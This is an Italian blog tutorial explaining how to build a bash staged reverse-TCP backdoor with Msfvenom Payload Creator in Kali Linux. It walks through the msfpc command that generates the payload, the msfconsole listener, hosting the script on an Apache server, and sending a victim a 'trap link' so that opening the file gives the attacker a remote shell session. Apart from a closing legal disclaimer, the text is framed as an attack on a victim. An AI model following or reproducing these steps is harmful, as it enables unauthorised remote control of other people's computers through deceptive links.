Oggi andremo a parlare dei procedimenti per creare bash-shell-staged-reverse-tcp backdoor, di cui la creazione è abbastanza simile alla linux-shell-staged-bind-tcp backdoor, della quale ho parlato nel precedente articolo. Infatti lo scopo della backdoor che andremo ad analizzare oggi è sempre quello di evadere le misure di sicurezza di un sistema ed entrarvi, prendendo ampi poteri di comando della macchina remota. Come potete immaginare anche il programma per creare bash-shell-staged-reverse-tcp backdoor è uguale a quello che abbiamo adoperato per creare la backdoor che vi ho illustrato nel recente tutorial; stiamo parlando di Msfvenom Payload Creator, un tool incluso in Kali Linux che ci consente di dar vita a un gran numero di backdoor. Ma adesso vediamo i vari passaggi utili per creare la backdoor di cui stiamo parlando in questo articolo.

Per prima cosa andiamo su Applicazioni>Strumenti di exploiting>msf payload creator

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

Bene, una volta che si aprirà il terminale digitiamo il seguente comando:

/usr/bin/msfpc verbose loop “IP locale”

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

Noterete che nella sezione Home si andranno a creare una serie di file; di questi, per adesso, solo uno ci sarà utile; stiamo parlando del file “bash-shell-staged-reverse-tcp-443.sh”.

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

Ricordo che per trovare l’IP locale basterà aprire un nuovo terminale e digitare il comando “ifconfig”

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

Adesso sul terminale di msf payload creator possiamo digitare questo comando:

msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-443-sh.rc’

Dopo aver digitato questo comando si starterà la msfconsole di Metasploit Framework, che si metterà in ascolto.

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

Ora è il momento di trasferire il file “bash-shell-staged-reverse-tcp-443.sh” nel percorso “computer>var>www>html”.

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

A questo punto apriamo un nuovo terminale e digitiamo il comando “service apache2 start”

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

 

Siamo quasi giunti al termine dell’attacco; basterà inviare alla vittima un link con la seguente struttura: “nostro indirizzo IP”/bash-shell-staged-reverse-tcp-443.sh

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

Ovviamente al posto di “nostro indirizzo IP” andrete a inserire il vostro IP locale, che avete già ricavato in precedenza con il comando “ifconfig”.

Quando la vittima cliccherà sul link-trappola che le avrete inviato, si avvierà in automatico il download della backdoor sul suo computer e una volta che il file verrà aperto il terminale di Metasploit Framework aprirà una sessione con il PC della vittima.

Creare bash-shell-staged-reverse-tcp backdoor

 

 

 

 

 

Se non avete chiaro il quadro dei comandi potete sempre digitare il comando “help” sul terminale di Metasploit e vi verrà fornito un quadro completo di azioni che potete svolgere sul sistema remoto.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

 

Leggi anche il nostro articolo Generare un link maligno con Kali Linux.